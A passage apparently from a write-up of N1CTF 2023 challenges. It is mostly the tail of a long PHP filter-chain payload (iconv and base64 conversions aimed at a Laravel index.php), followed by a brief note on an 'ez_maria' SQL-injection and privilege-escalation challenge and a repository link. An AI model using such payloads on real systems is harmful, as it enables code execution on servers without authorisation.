iconv.JS.UNICODE|convert.iconv.L4.UCS2|convert.iconv.UCS-2.OSF00030010|convert.iconv.CSIBM1008.UTF32BE|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.PT.UTF32|convert.iconv.KOI8-U.IBM-932|convert.iconv.SJIS.EUCJP-WIN|convert.iconv.L10.UCS4|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CP861.UTF-16|convert.iconv.L4.GB13000|convert.iconv.BIG5.JOHAB|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.PT.UTF32|convert.iconv.KOI8-U.IBM-932|convert.iconv.SJIS.EUCJP-WIN|convert.iconv.L10.UCS4|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CP1046.UTF16|convert.iconv.ISO6937.SHIFT_JISX0213|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CSIBM1161.UNICODE|convert.iconv.ISO-IR-156.JOHAB|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.L5.UTF-32|convert.iconv.ISO88594.GB13000|convert.iconv.CP950.SHIFT_JISX0213|convert.iconv.UHC.JOHAB|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.863.UNICODE|convert.iconv.ISIRI3342.UCS4|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.JS.UNICODE|convert.iconv.L4.UCS2|convert.iconv.UCS-4LE.OSF05010001|convert.iconv.IBM912.UTF-16LE|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.MAC.UTF16|convert.iconv.L8.UTF16BE|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.SE2.UTF-16|convert.iconv.CSIBM1161.IBM-932|convert.iconv.MS932.MS936|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CP367.UTF-16|convert.iconv.CSIBM901.SHIFT_JISX0213|convert.iconv.UHC.CP1361|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.L5.UTF-32|convert.iconv.ISO88594.GB13000|convert.iconv.CP949.UTF32BE|convert.iconv.ISO_69372.CSIBM921|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CP861.UTF-16|convert.iconv.L4.GB13000|convert.iconv.BIG5.JOHAB|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.L6.UNICODE|convert.iconv.CP1282.ISO-IR-90|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.L6.UNICODE|convert.iconv.CP1282.ISO-IR-90|convert.iconv.CSA_T500-1983.UCS-2BE|convert.iconv.MIK.UCS2|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.SE2.UTF-16|convert.iconv.CSIBM921.NAPLPS|convert.iconv.855.CP936|convert.iconv.IBM-932.UTF-8|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.8859_3.UTF16|convert.iconv.863.SHIFT_JISX0213|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CP1046.UTF16|convert.iconv.ISO6937.SHIFT_JISX0213|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CP1046.UTF32|convert.iconv.L6.UCS-2|convert.iconv.UTF-16LE.T.61-8BIT|convert.iconv.865.UCS-4LE|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.MAC.UTF16|convert.iconv.L8.UTF16BE|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CSIBM1161.UNICODE|convert.iconv.ISO-IR-156.JOHAB|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.INIS.UTF16|convert.iconv.CSIBM1133.IBM943|convert.iconv.IBM932.SHIFT_JISX0213|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.SE2.UTF-16|convert.iconv.CSIBM1161.IBM-932|convert.iconv.MS932.MS936|convert.iconv.BIG5.JOHAB|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.base64-decode/resource=/laravel/public/index.php"
}
}
|
ez_maria
SQL注入加提权
敬请参考
https://github.com/Nu1LCTF/n1ctf-2023/tree/main